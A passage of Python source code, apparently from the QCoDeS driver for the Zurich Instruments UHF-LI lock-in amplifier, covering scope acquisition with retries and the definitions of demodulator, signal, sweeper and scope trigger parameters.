raise ValueError('Scope not properly prepared. Please run '
'prepare_scope before measuring.')
# A convenient reference
params = self.instrument.parameters
#
chans = {1: (True, False), 2: (False, True), 3: (True, True)}
channels = chans[params['scope_channels'].get()]
if params['scope_trig_holdoffmode'].get_latest() == 'events':
raise NotImplementedError('Scope trigger holdoff in number of '
'events not supported. Please specify '
'holdoff in seconds.')
#######################################################
# The following steps SEEM to give the correct result
# Make sure all settings have taken effect
self.instrument.daq.sync()
# Calculate the time needed for the measurement. We often have failed
# measurements, so a timeout is needed.
if params['scope_segments'].get() == 'ON':
segs = params['scope_segments_count'].get()
else:
segs = 1
deadtime = params['scope_trig_holdoffseconds'].get_latest()
# We add one second to account for latencies and random delays
meas_time = segs*(params['scope_duration'].get()+deadtime)+1
npts = params['scope_length'].get()
zi_error = True
error_counter = 0
num_retries = 10
timedout = False
while (zi_error or timedout) and error_counter < num_retries:
# one shot per trigger. This needs to be set every time
# a the scope is enabled as below using scope_runstop
try:
# we wrap this in try finally to ensure that
# scope.finish is always called even if the
# measurement is interrupted
self.instrument.daq.setInt(
f"/{self.instrument.device}/scopes/0/single", 1
)
scope = self.instrument.scope
scope.set('scopeModule/clearhistory', 1)
# Start the scope triggering/acquiring
# set /dev/scopes/0/enable to 1
params['scope_runstop'].set('run')
self.instrument.daq.sync()
log.debug('Starting ZI scope acquisition.')
# Start something... hauling data from the scopeModule?
scope.execute()
# Now perform actions that may produce data, e.g. running an AWG
for action in self._scopeactions:
action()
starttime = time.time()
timedout = False
progress = scope.progress()
while progress < 1:
log.debug(f'Scope progress is {progress}')
progress = scope.progress()
time.sleep(0.1) # This while+sleep is how ZI engineers do it
if (time.time()-starttime) > 20*meas_time+1:
timedout = True
break
metadata = scope.get("scopeModule/*")
zi_error = bool(metadata['error'][0])
# Stop the scope from running
params['scope_runstop'].set('stop')
if not (timedout or zi_error):
log.info('[+] ZI scope acquisition completed OK')
rawdata = scope.read()
if "error" in rawdata:
zi_error = bool(rawdata["error"][0])
data = self._scopedataparser(
rawdata, self.instrument.device, npts, segs, channels
)
else:
log.warning('[-] ZI scope acquisition attempt {} '
'failed, Timeout: {}, Error: {}, '
'retrying'.format(error_counter, timedout, zi_error))
rawdata = None
data = (None, None)
error_counter += 1
if error_counter >= num_retries:
log.error('[+] ZI scope acquisition failed, maximum number'
'of retries performed. No data returned')
raise RuntimeError('[+] ZI scope acquisition failed, maximum number'
'of retries performed. No data returned')
finally:
# cleanup and make ready for next scope acquisition
scope.finish()
t_stop = time.monotonic()
log.info('scope get method returning after {} s'.format(t_stop -
t_start))
return data
@staticmethod
def _scopedataparser(rawdata, deviceID, scopelength, segments, channels):
"""
Cast the scope return value dict into a tuple.
Args:
rawdata (dict): The return of scopeModule.read()
deviceID (str): The device ID string of the instrument.
scopelength (int): The length of each segment
segments (int): The number of segments
channels (tuple): Tuple of two bools controlling what data to return
(True, False) will return data for channel 1 etc.
Returns:
tuple: A 2-tuple of either None or np.array with dimensions
segments x scopelength.
"""
data = rawdata[f'{deviceID}']['scopes']['0']['wave'][0][0]
if channels[0]:
ch1data = data['wave'][0].reshape(segments, scopelength)
else:
ch1data = None
if channels[1]:
ch2data = data['wave'][1].reshape(segments, scopelength)
else:
ch2data = None
return (ch1data, ch2data)
class ZIUHFLI(Instrument):
"""
QCoDeS driver for ZI UHF-LI.
Currently implementing demodulator settings and the sweeper functionality.
Requires ZI Lab One software to be installed on the computer running QCoDeS.
Furthermore, the Data Server and Web Server must be running and a connection
between the two must be made.
TODOs:
* Add zoom-FFT
"""
@deprecate(reason="There is a new UHFLI driver from Zurich Instruments",
alternative="instrument_drivers.zurich_instruments.uhfli.UHFLI")
def __init__(self, name: str, device_ID: str, **kwargs) -> None:
"""
Create an instance of the instrument.
Args:
name (str): The internal QCoDeS name of the instrument
device_ID (str): The device name as listed in the web server.
"""
super().__init__(name, **kwargs)
self.api_level = 5
zisession = zhinst.utils.create_api_session(device_ID, self.api_level)
(self.daq, self.device, self.props) = zisession
self.daq.setDebugLevel(3)
# create (instantiate) an instance of each module we will use
self.sweeper = self.daq.sweep()
self.sweeper.set('sweep/device', self.device)
self.scope = self.daq.scopeModule()
self.scope.subscribe(f'/{self.device}/scopes/0/wave')
########################################
# INSTRUMENT PARAMETERS
########################################
# Oscillators
number_of_oscillators = 8 if 'MF' in self.props['options'] else 2
for oscs in range(1, number_of_oscillators + 1):
self.add_parameter(f'oscillator{oscs}_freq',
label=f'Frequency of oscillator {oscs}',
unit='Hz',
set_cmd=partial(self._setter, 'oscs',
oscs-1, 1, 'freq'),
get_cmd=partial(self._getter, 'oscs',
oscs-1, 1, 'freq'),
vals=vals.Numbers(0, 600e6))
self.add_parameter(f'demod{oscs}_oscillator',
label=f'Selected oscillator {oscs}',
docstring="Connects the demodulator with the "
"supplied oscillator.",
get_cmd=partial(self._getter, 'demods',
oscs - 1, 0, 'oscselect'),
set_cmd=partial(self._setter, 'demods',
oscs - 1, 0, 'oscselect'),
val_mapping={i + 1: i for i in
range(number_of_oscillators)})
########################################
# DEMODULATOR PARAMETERS
for demod in range(1, 9):
self.add_parameter(f'demod{demod}_order',
label='Filter order',
get_cmd=partial(self._getter, 'demods',
demod-1, 0, 'order'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'order'),
vals=vals.Ints(1, 8)
)
self.add_parameter(f'demod{demod}_harmonic',
label=('Reference frequency multiplication' +
' factor'),
get_cmd=partial(self._getter, 'demods',
demod-1, 0, 'harmonic'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'harmonic'),
vals=vals.Ints(1, 999)
)
self.add_parameter(f'demod{demod}_timeconstant',
label='Filter time constant',
get_cmd=partial(self._getter, 'demods',
demod-1, 1, 'timeconstant'),
set_cmd=partial(self._setter, 'demods',
demod-1, 1, 'timeconstant'),
unit='s'
)
self.add_parameter(f'demod{demod}_samplerate',
label='Sample rate',
get_cmd=partial(self._getter, 'demods',
demod-1, 1, 'rate'),
set_cmd=partial(self._setter, 'demods',
demod-1, 1, 'rate'),
unit='Sa/s',
docstring="""
Note: the value inserted by the user
may be approximated to the
nearest value supported by the
instrument.
""")
self.add_parameter(f'demod{demod}_phaseshift',
label='Phase shift',
unit='degrees',
get_cmd=partial(self._getter, 'demods',
demod-1, 1, 'phaseshift'),
set_cmd=partial(self._setter, 'demods',
demod-1, 1, 'phaseshift')
)
# val_mapping for the demodX_signalin parameter
dmsigins = {'Sig In 1': 0,
'Sig In 2': 1,
'Trigger 1': 2,
'Trigger 2': 3,
'Aux Out 1': 4,
'Aux Out 2': 5,
'Aux Out 3': 6,
'Aux Out 4': 7,
'Aux In 1': 8,
'Aux In 2': 9,
'Phi Demod 4': 10,
'Phi Demod 8': 11}
self.add_parameter(f'demod{demod}_signalin',
label='Signal input',
get_cmd=partial(self._getter, 'demods',
demod-1, 0,'adcselect'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'adcselect'),
val_mapping=dmsigins,
vals=vals.Enum(*list(dmsigins.keys()))
)
self.add_parameter(f'demod{demod}_sinc',
label='Sinc filter',
get_cmd=partial(self._getter, 'demods',
demod-1, 0, 'sinc'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'sinc'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF')
)
self.add_parameter(f'demod{demod}_streaming',
label='Data streaming',
get_cmd=partial(self._getter, 'demods',
demod-1, 0, 'enable'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'enable'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF')
)
dmtrigs = {'Continuous': 0,
'Trigger in 3 Rise': 1,
'Trigger in 3 Fall': 2,
'Trigger in 3 Both': 3,
'Trigger in 3 High': 32,
'Trigger in 3 Low': 16,
'Trigger in 4 Rise': 4,
'Trigger in 4 Fall': 8,
'Trigger in 4 Both': 12,
'Trigger in 4 High': 128,
'Trigger in 4 Low': 64,
'Trigger in 3|4 Rise': 5,
'Trigger in 3|4 Fall': 10,
'Trigger in 3|4 Both': 15,
'Trigger in 3|4 High': 160,
'Trigger in 3|4 Low': 80}
self.add_parameter(f'demod{demod}_trigger',
label='Trigger',
get_cmd=partial(self._getter, 'demods',
demod-1, 0, 'trigger'),
set_cmd=partial(self._setter, 'demods',
demod-1, 0, 'trigger'),
val_mapping=dmtrigs,
vals=vals.Enum(*list(dmtrigs.keys()))
)
self.add_parameter(f'demod{demod}_sample',
label='Demod sample',
get_cmd=partial(self._getter, 'demods',
demod - 1, 2, 'sample'),
snapshot_value=False
)
for demod_param in ['x', 'y', 'R', 'phi']:
if demod_param in ('x', 'y', 'R'):
unit = 'V'
else:
unit = 'deg'
self.add_parameter(f'demod{demod}_{demod_param}',
label=f'Demod {demod} {demod_param}',
get_cmd=partial(self._get_demod_sample,
demod - 1, demod_param),
snapshot_value=False,
unit=unit
)
########################################
# SIGNAL INPUTS
for sigin in range(1, 3):
self.add_parameter(f'signal_input{sigin}_range',
label='Input range',
set_cmd=partial(self._setter, 'sigins',
sigin-1, 1, 'range'),
get_cmd=partial(self._getter, 'sigins',
sigin-1, 1, 'range'),
unit='V')
self.add_parameter(f'signal_input{sigin}_scaling',
label='Input scaling',
set_cmd=partial(self._setter, 'sigins',
sigin-1, 1, 'scaling'),
get_cmd=partial(self._getter, 'sigins',
sigin-1, 1, 'scaling'),
)
self.add_parameter(f'signal_input{sigin}_AC',
label='AC coupling',
set_cmd=partial(self._setter,'sigins',
sigin-1, 0, 'ac'),
get_cmd=partial(self._getter, 'sigins',
sigin-1, 0, 'ac'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF')
)
self.add_parameter(f'signal_input{sigin}_impedance',
label='Input impedance',
set_cmd=partial(self._setter, 'sigins',
sigin-1, 0, 'imp50'),
get_cmd=partial(self._getter, 'sigins',
sigin-1, 0, 'imp50'),
val_mapping={50: 1, 1000: 0},
vals=vals.Enum(50, 1000)
)
sigindiffs = {'Off': 0, 'Inverted': 1, 'Input 1 - Input 2': 2,
'Input 2 - Input 1': 3}
self.add_parameter(f'signal_input{sigin}_diff',
label='Input signal subtraction',
set_cmd=partial(self._setter, 'sigins',
sigin-1, 0, 'diff'),
get_cmd=partial(self._getter, 'sigins',
sigin-1, 0, 'diff'),
val_mapping=sigindiffs,
vals=vals.Enum(*list(sigindiffs.keys())))
########################################
# SIGNAL OUTPUTS
outputamps = {1: 'amplitudes/3', 2: 'amplitudes/7'}
outputampenable = {1: 'enables/3', 2: 'enables/7'}
for sigout in range(1,3):
self.add_parameter(f'signal_output{sigout}_on',
label='Turn signal output on and off.',
set_cmd=partial(self._sigout_setter,
sigout-1, 0, 'on'),
get_cmd=partial(self._sigout_getter,
sigout-1, 0, 'on'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF') )
self.add_parameter(f'signal_output{sigout}_imp50',
label='Switch to turn on 50 Ohm impedance',
set_cmd=partial(self._sigout_setter,
sigout-1, 0, 'imp50'),
get_cmd=partial(self._sigout_getter,
sigout-1, 0, 'imp50'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF') )
self.add_parameter(f'signal_output{sigout}_ampdef',
get_cmd=None, set_cmd=None,
initial_value='Vpk',
label="Signal output amplitude's definition",
unit='',
vals=vals.Enum('Vpk', 'Vrms', 'dBm'))
self.add_parameter(f'signal_output{sigout}_range',
label='Signal output range',
set_cmd=partial(self._sigout_setter,
sigout-1, 1, 'range'),
get_cmd=partial(self._sigout_getter,
sigout-1, 1, 'range'),
vals=vals.Enum(0.075, 0.15, 0.75, 1.5))
self.add_parameter(f'signal_output{sigout}_offset',
label='Signal output offset',
set_cmd=partial(self._sigout_setter,
sigout-1, 1, 'offset'),
get_cmd=partial(self._sigout_getter,
sigout-1, 1, 'offset'),
vals=vals.Numbers(-1.5, 1.5),
unit='V')
self.add_parameter(f'signal_output{sigout}_autorange',
label='Enable signal output range.',
set_cmd=partial(self._sigout_setter,
sigout-1, 0, 'autorange'),
get_cmd=partial(self._sigout_getter,
sigout-1, 0, 'autorange'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF') )
if 'MF' in self.props['options']:
for modeout in range(1, 9):
self.add_parameter(
f'signal_output{sigout}_amplitude{modeout}',
label='Signal output amplitude',
set_cmd=partial(self._sigout_setter,
sigout - 1, 1, 'amplitudes',
output_mode=modeout - 1),
get_cmd=partial(self._sigout_getter,
sigout - 1, 1, 'amplitudes',
output_mode=modeout - 1),
docstring="Set the signal output amplitude. The actual "
"unit and representation is defined by "
"signal_output{}_ampdef "
"parameter".format(sigout))
self.add_parameter(
f'signal_output{sigout}_enable{modeout}',
label="Output signal enabled/disabled.",
set_cmd=partial(self._sigout_setter,
sigout - 1, 0,
'enables', output_mode=modeout - 1),
get_cmd=partial(self._sigout_getter,
sigout - 1, 0,
'enables', output_mode=modeout - 1),
val_mapping=create_on_off_val_mapping(),
docstring="Enabling/Disabling the Signal Output. "
"Corresponds to the blue LED indicator on "
"the instrument front panel.")
else:
self.add_parameter(
f'signal_output{sigout}_enable',
label="Output signal enabled/disabled.",
set_cmd=partial(self._sigout_setter,
sigout - 1, 0,
outputampenable[sigout]),
get_cmd=partial(self._sigout_getter,
sigout - 1, 0,
outputampenable[sigout]),
val_mapping=create_on_off_val_mapping(),
docstring="Enabling/Disabling the Signal Output. "
"Corresponds to the blue LED indicator on "
"the instrument front panel."
)
self.add_parameter(
f'signal_output{sigout}_amplitude',
label='Signal output amplitude',
set_cmd=partial(self._sigout_setter,
sigout - 1, 1,
outputamps[sigout]),
get_cmd=partial(self._sigout_getter,
sigout - 1, 1,
outputamps[sigout]),
docstring="Set the signal output amplitude. The actual unit"
" and representation is defined by "
"signal_output{}_ampdef parameter".format(sigout))
auxoutputchannels = ChannelList(self, "AUXOutputChannels", AUXOutputChannel,
snapshotable=False)
for auxchannum in range(1,5):
name = f'aux_out{auxchannum}'
auxchannel = AUXOutputChannel(self, name, auxchannum)
auxoutputchannels.append(auxchannel)
self.add_submodule(name, auxchannel)
auxoutputchannels.lock()
self.add_submodule('aux_out_channels', auxoutputchannels)
########################################
# SWEEPER PARAMETERS
self.add_parameter('sweeper_BWmode',
label='Sweeper bandwidth control mode',
set_cmd=partial(self._sweep_setter,
'sweep/bandwidthcontrol'),
get_cmd=partial(self._sweep_getter,
'sweep/bandwidthcontrol'),
val_mapping={'auto': 2, 'fixed': 1, 'current': 0},
docstring="""
For each sweep point, the demodulator
filter bandwidth (time constant) may
be either set automatically, be the
current demodulator bandwidth or be
a fixed number; the sweeper_BW
parameter.
"""
)
self.add_parameter('sweeper_BW',
label='Fixed bandwidth sweeper bandwidth (NEP)',
set_cmd=partial(self._sweep_setter,
'sweep/bandwidth'),
get_cmd=partial(self._sweep_getter,
'sweep/bandwidth'),
docstring="""
This is the NEP bandwidth used by the
sweeper if sweeper_BWmode is set to
'fixed'. If sweeper_BWmode is either
'auto' or 'current', this value is
ignored.
"""
)
self.add_parameter('sweeper_start',
label='Start value of the sweep',
set_cmd=partial(self._sweep_setter,
'sweep/start'),
get_cmd=partial(self._sweep_getter,
'sweep/start'),
vals=vals.Numbers(0, 600e6))
self.add_parameter('sweeper_stop',
label='Stop value of the sweep',
set_cmd=partial(self._sweep_setter,
'sweep/stop'),
get_cmd=partial(self._sweep_getter,
'sweep/stop'),
vals=vals.Numbers(0, 600e6))
self.add_parameter('sweeper_samplecount',
label='Length of the sweep (pts)',
set_cmd=partial(self._sweep_setter,
'sweep/samplecount'),
get_cmd=partial(self._sweep_getter,
'sweep/samplecount'),
vals=vals.Ints(0, 100000))
# val_mapping for sweeper_param parameter
sweepparams = {'Aux Out 1 Offset': 'auxouts/0/offset',
'Aux Out 2 Offset': 'auxouts/1/offset',
'Aux Out 3 Offset': 'auxouts/2/offset',
'Aux Out 4 Offset': 'auxouts/3/offset',
'Demod 1 Phase Shift': 'demods/0/phaseshift',
'Demod 2 Phase Shift': 'demods/1/phaseshift',
'Demod 3 Phase Shift': 'demods/2/phaseshift',
'Demod 4 Phase Shift': 'demods/3/phaseshift',
'Demod 5 Phase Shift': 'demods/4/phaseshift',
'Demod 6 Phase Shift': 'demods/5/phaseshift',
'Demod 7 Phase Shift': 'demods/6/phaseshift',
'Demod 8 Phase Shift': 'demods/7/phaseshift',
'Osc 1 Frequency': 'oscs/0/freq',
'Osc 2 Frequency': 'oscs/1/freq',
'Output 1 Amplitude 4': 'sigouts/0/amplitudes/3',
'Output 1 Offset': 'sigouts/0/offset',
'Output 2 Amplitude 8': 'sigouts/1/amplitudes/7',
'Output 2 Offset': 'sigouts/1/offset'
}
self.add_parameter('sweeper_param',
label='Parameter to sweep (sweep x-axis)',
set_cmd=partial(self._sweep_setter,
'sweep/gridnode'),
val_mapping=sweepparams,
get_cmd=partial(self._sweep_getter,
'sweep/gridnode'),
vals=vals.Enum(*list(sweepparams.keys()))
)
# val_mapping for sweeper_units parameter
sweepunits = {'Aux Out 1 Offset': 'V',
'Aux Out 2 Offset': 'V',
'Aux Out 3 Offset': 'V',
'Aux Out 4 Offset': 'V',
'Demod 1 Phase Shift': 'degrees',
'Demod 2 Phase Shift': 'degrees',
'Demod 3 Phase Shift': 'degrees',
'Demod 4 Phase Shift': 'degrees',
'Demod 5 Phase Shift': 'degrees',
'Demod 6 Phase Shift': 'degrees',
'Demod 7 Phase Shift': 'degrees',
'Demod 8 Phase Shift': 'degrees',
'Osc 1 Frequency': 'Hz',
'Osc 2 Frequency': 'Hz',
'Output 1 Amplitude 4': 'V',
'Output 1 Offset': 'V',
'Output 2 Amplitude 8': 'V',
'Output 2 Offset': 'V'
}
self.add_parameter('sweeper_units',
label='Units of sweep x-axis',
get_cmd=self.sweeper_param.get,
get_parser=lambda x:sweepunits[x])
# val_mapping for sweeper_mode parameter
sweepmodes = {'Sequential': 0,
'Binary': 1,
'Biderectional': 2,
'Reverse': 3}
self.add_parameter('sweeper_mode',
label='Sweep mode',
set_cmd=partial(self._sweep_setter,
'sweep/scan'),
get_cmd=partial(self._sweep_getter, 'sweep/scan'),
val_mapping=sweepmodes,
vals=vals.Enum(*list(sweepmodes))
)
self.add_parameter('sweeper_order',
label='Sweeper filter order',
set_cmd=partial(self._sweep_setter,
'sweep/order'),
get_cmd=partial(self._sweep_getter,
'sweep/order'),
vals=vals.Ints(1, 8),
docstring="""
This value is invoked only when the
sweeper_BWmode is set to 'fixed'.
""")
self.add_parameter('sweeper_settlingtime',
label=('Minimal settling time for the ' +
'sweeper'),
set_cmd=partial(self._sweep_setter,
'sweep/settling/time'),
get_cmd=partial(self._sweep_getter,
'sweep/settling/time'),
vals=vals.Numbers(0),
unit='s',
docstring="""
This is the minimal waiting time
at each point during a sweep before the
data acquisition starts. Note that the
filter settings may result in a longer
actual waiting/settling time.
"""
)
self.add_parameter('sweeper_inaccuracy',
label='Demodulator filter settling inaccuracy',
set_cmd=partial(self._sweep_setter,
'sweep/settling/inaccuracy'),
docstring="""
Demodulator filter settling inaccuracy
defining the wait time between a sweep
parameter change and recording of the
next sweep point. The settling time is
calculated as the time required to attain
the specified remaining proportion [1e-13,
0.1] of an incoming step function. Typical
inaccuracy values: 10m for highest sweep
speed for large signals, 100u for precise
amplitude measurements, 100n for precise
noise measurements. Depending on the
order of the demodulator filter the settling
inaccuracy will define the number of filter
time constants the sweeper has to wait. The
maximum between this value and the settling
time is taken as wait time until the next
sweep point is recorded.
"""
)
self.add_parameter('sweeper_settlingtc',
label='Sweep filter settling time',
get_cmd=partial(self._sweep_getter,
'sweep/settling/tc'),
unit='',
docstring="""This settling time is in units of
the filter time constant."""
)
self.add_parameter('sweeper_averaging_samples',
label=('Minimal no. of samples to average at ' +
'each sweep point'),
set_cmd=partial(self._sweep_setter,
'sweep/averaging/sample'),
get_cmd=partial(self._sweep_getter,
'sweep/averaging/sample'),
vals=vals.Ints(1),
docstring="""
The actual number of samples is the
maximum of this value and the
sweeper_averaging_time times the
relevant sample rate.
"""
)
self.add_parameter('sweeper_averaging_time',
label=('Minimal averaging time'),
set_cmd=partial(self._sweep_setter,
'sweep/averaging/tc'),
get_cmd=partial(self._sweep_getter,
'sweep/averaging/tc'),
unit='s',
docstring="""
The actual number of samples is the
maximum of this value times the
relevant sample rate and the
sweeper_averaging_samples."""
)
self.add_parameter('sweeper_xmapping',
label='Sweeper x mapping',
set_cmd=partial(self._sweep_setter,
'sweep/xmapping'),
get_cmd=partial(self._sweep_getter,
'sweep/xmapping'),
val_mapping={'lin': 0, 'log': 1}
)
self.add_parameter('sweeper_sweeptime',
label='Expected sweep time',
unit='s',
get_cmd=self._get_sweep_time)
self.add_parameter('sweeper_timeout',
label='Sweep timeout',
unit='s',
initial_value=600,
get_cmd=None, set_cmd=None)
########################################
# THE SWEEP ITSELF
self.add_parameter('Sweep',
parameter_class=Sweep,
)
# A "manual" parameter: a list of the signals for the sweeper
# to subscribe to
self._sweeper_signals = [] # type: List[str]
# This is the dictionary keeping track of the sweeper settings
# These are the default settings
self._sweepdict = {'start': 1e6,
'stop': 10e6,
'samplecount': 25,
'bandwidthcontrol': 1, # fixed mode
'bandwidth': 50,
'gridnode': 'oscs/0/freq',
'scan': 0, # sequential scan
'order': 1,
'settling/time': 1e-6,
'settling/inaccuracy': 10e-3,
'averaging/sample': 25,
'averaging/tc': 100e-3,
'xmapping': 0, # linear
}
# Set up the sweeper with the above settings
self.Sweep.build_sweep()
########################################
# SCOPE PARAMETERS
# default parameters:
# This parameter corresponds to the Run/Stop button in the GUI
self.add_parameter('scope_runstop',
label='Scope run state',
set_cmd=partial(self._setter, 'scopes', 0, 0,
'enable'),
get_cmd=partial(self._getter, 'scopes', 0, 0,
'enable'),
val_mapping={'run': 1, 'stop': 0},
vals=vals.Enum('run', 'stop'),
docstring=('This parameter corresponds to the '
'run/stop button in the GUI.'))
self.add_parameter('scope_mode',
label="Scope's mode: time or frequency domain.",
set_cmd=partial(self._scope_setter, 1, 0,
'mode'),
get_cmd=partial(self._scope_getter, 'mode'),
val_mapping={'Time Domain': 1,
'Freq Domain FFT': 3},
vals=vals.Enum('Time Domain', 'Freq Domain FFT')
)
# 1: Channel 1 on, Channel 2 off.
# 2: Channel 1 off, Channel 2 on,
# 3: Channel 1 on, Channel 2 on.
self.add_parameter('scope_channels',
label='Recorded scope channels',
set_cmd=partial(self._scope_setter, 0, 0,
'channel'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'channel'),
vals=vals.Enum(1, 2, 3)
)
self._samplingrate_codes = {'1.80 GHz': 0,
'900 MHz': 1,
'450 MHz': 2,
'225 MHz': 3,
'113 MHz': 4,
'56.2 MHz': 5,
'28.1 MHz': 6,
'14.0 MHz': 7,
'7.03 MHz': 8,
'3.50 MHz': 9,
'1.75 MHz': 10,
'880 kHz': 11,
'440 kHz': 12,
'220 kHz': 13,
'110 kHz': 14,
'54.9 kHz': 15,
'27.5 kHz': 16}
self.add_parameter('scope_samplingrate',
label="Scope's sampling rate",
set_cmd=partial(self._scope_setter, 0, 0,
'time'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'time'),
val_mapping=self._samplingrate_codes,
vals=vals.Enum(*list(self._samplingrate_codes.keys()))
)
self.add_parameter(
"scope_samplingrate_float",
label="Scope's sampling rate as float",
set_cmd=self._set_samplingrate_as_float,
unit="Hz",
get_cmd=self._get_samplingrate_as_float,
vals=vals.Enum(
*(1.8e9 / 2 ** v for v in self._samplingrate_codes.values())
),
docstring=""" A numeric representation of the scope's
samplingrate parameter. Sets and gets the sampling
rate by using the scope_samplingrate parameter."""
)
self.add_parameter('scope_length',
label="Length of scope trace (pts)",
set_cmd=partial(self._scope_setter, 0, 1,
'length'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'length'),
vals=vals.Numbers(4096, 128000000),
get_parser=int
)
self.add_parameter('scope_duration',
label="Scope trace duration",
set_cmd=partial(self._scope_setter, 0, 0,
'duration'),
get_cmd=partial(self._scope_getter,
'duration'),
vals=vals.Numbers(2.27e-6,4.660e3),
unit='s'
)
# Map the possible input sources to LabOne's IDs.
# The IDs can be seen in log file of LabOne UI
inputselect = {'Signal Input 1': 0,
'Signal Input 2': 1,
'Trig Input 1': 2,
'Trig Input 2': 3,
'Aux Output 1': 4,
'Aux Output 2': 5,
'Aux Output 3': 6,
'Aux Output 4': 7,
'Aux In 1 Ch 1': 8,
'Aux In 1 Ch 2': 9,
'Osc phi Demod 4': 10,
'Osc phi Demod 8': 11,
'AU Cartesian 1': 112,
'AU Cartesian 2': 113,
'AU Polar 1': 128,
'AU Polar 2': 129,
}
# Add all 8 demodulators and their respective parameters
# to inputselect as well.
# Numbers correspond to LabOne IDs, taken from UI log.
for demod in range(1,9):
inputselect[f'Demod {demod} X'] = 15+demod
inputselect[f'Demod {demod} Y'] = 31+demod
inputselect[f'Demod {demod} R'] = 47+demod
inputselect[f'Demod {demod} Phase'] = 63+demod
for channel in range(1, 3):
self.add_parameter(
f"scope_channel{channel}_input",
label=(f"Scope's channel {channel}" + " input source"),
set_cmd=partial(
self._scope_setter, 0, 0, (f"channels/{channel-1}/" + "inputselect")
),
get_cmd=partial(
self._getter,
"scopes",
0,
0,
(f"channels/{channel-1}/" + "inputselect"),
),
val_mapping=inputselect,
vals=vals.Enum(*list(inputselect.keys())),
)
self.add_parameter('scope_average_weight',
label="Scope Averages",
set_cmd=partial(self._scope_setter, 1, 0,
'averager/weight'),
get_cmd=partial(self._scope_getter,
'averager/weight'),
vals=vals.Numbers(min_value=1)
)
self.add_parameter('scope_trig_enable',
label="Enable triggering for scope readout",
set_cmd=partial(self._setter, 'scopes', 0,
0, 'trigenable'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'trigenable'),
val_mapping={'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF')
)
self.add_parameter('scope_trig_signal',
label="Trigger signal source",
set_cmd=partial(self._setter, 'scopes', 0,
0, 'trigchannel'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'trigchannel'),
val_mapping=inputselect,
vals=vals.Enum(*list(inputselect.keys()))
)
slopes = {'None': 0, 'Rise': 1, 'Fall': 2, 'Both': 3}
self.add_parameter('scope_trig_slope',
label="Scope's triggering slope",
set_cmd=partial(self._setter, 'scopes', 0,
0, 'trigslope'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'trigslope'),
val_mapping=slopes,
vals=vals.Enum(*list(slopes.keys()))
)
# TODO: figure out how value/percent works for the trigger level
self.add_parameter('scope_trig_level',
label="Scope trigger level",
set_cmd=partial(self._setter, 'scopes', 0,
1, 'triglevel'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'triglevel'),
vals=vals.Numbers()
)
self.add_parameter('scope_trig_hystmode',
label="Enable triggering for scope readout.",
set_cmd=partial(self._setter, 'scopes', 0,
0, 'trighysteresis/mode'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'trighysteresis/mode'),
val_mapping={'absolute': 0, 'relative': 1},
vals=vals.Enum('absolute', 'relative')
)
self.add_parameter('scope_trig_hystrelative',
label="Trigger hysteresis, relative value in %",
set_cmd=partial(self._setter, 'scopes', 0,
1, 'trighysteresis/relative'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'trighysteresis/relative'),
# val_mapping= lambda x: 0.01*x,
vals=vals.Numbers(0)
)
self.add_parameter('scope_trig_hystabsolute',
label="Trigger hysteresis, absolute value",
set_cmd=partial(self._setter, 'scopes', 0,
1, 'trighysteresis/absolute'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'trighysteresis/absolute'),
vals=vals.Numbers(0, 20)
)
triggates = {'Trigger In 3 High': 0, 'Trigger In 3 Low': 1,
'Trigger In 4 High': 2, 'Trigger In 4 Low': 3}
self.add_parameter('scope_trig_gating_source',
label='Scope trigger gating source',
set_cmd=partial(self._setter, 'scopes', 0, 0,
'triggate/inputselect'),
get_cmd=partial(self._getter, 'scopes', 0, 0,
'triggate/inputselect'),
val_mapping=triggates,
vals=vals.Enum(*list(triggates.keys()))
)
self.add_parameter('scope_trig_gating_enable',
label='Scope trigger gating ON/OFF',
set_cmd=partial(self._setter, 'scopes', 0, 0,
'triggate/enable'),
get_cmd=partial(self._getter, 'scopes', 0, 0,
'triggate/enable'),
val_mapping = {'ON': 1, 'OFF': 0},
vals=vals.Enum('ON', 'OFF'))
self.add_parameter('scope_trig_holdoffmode',
label="Scope trigger holdoff mode",
set_cmd=partial(self._setter, 'scopes', 0,
0, 'trigholdoffmode'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'trigholdoffmode'),
val_mapping={'s': 0, 'events': 1},
vals=vals.Enum('s', 'events')
)
self.add_parameter('scope_trig_holdoffseconds',
label='Scope trigger holdoff',
set_cmd=partial(self._scope_setter, 0, 1,
'trigholdoff'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'trigholdoff'),
unit='s',
vals=vals.Numbers(20e-6, 10)
)
self.add_parameter('scope_trig_reference',
label='Scope trigger reference',
set_cmd=partial(self._scope_setter, 0, 1,
'trigreference'),
get_cmd=partial(self._getter, 'scopes', 0,
1, 'trigreference'),
vals=vals.Numbers(0, 100)
)
# TODO: add validation. What's the minimal/maximal delay?
self.add_parameter('scope_trig_delay',
label='Scope trigger delay',
set_cmd=partial(self._scope_setter, 0, 1,
'trigdelay'),
get_cmd=partial(self._getter, 'scopes', 0, 1,
'trigdelay'),
unit='s')
self.add_parameter('scope_segments',
label='Enable/disable segments',
set_cmd=partial(self._scope_setter, 0, 0,
'segments/enable'),
get_cmd=partial(self._getter, 'scopes', 0,
0, 'segments/enable'),
val_mapping={'OFF': 0, 'ON': 1},
vals=vals.Enum('ON', 'OFF')
)
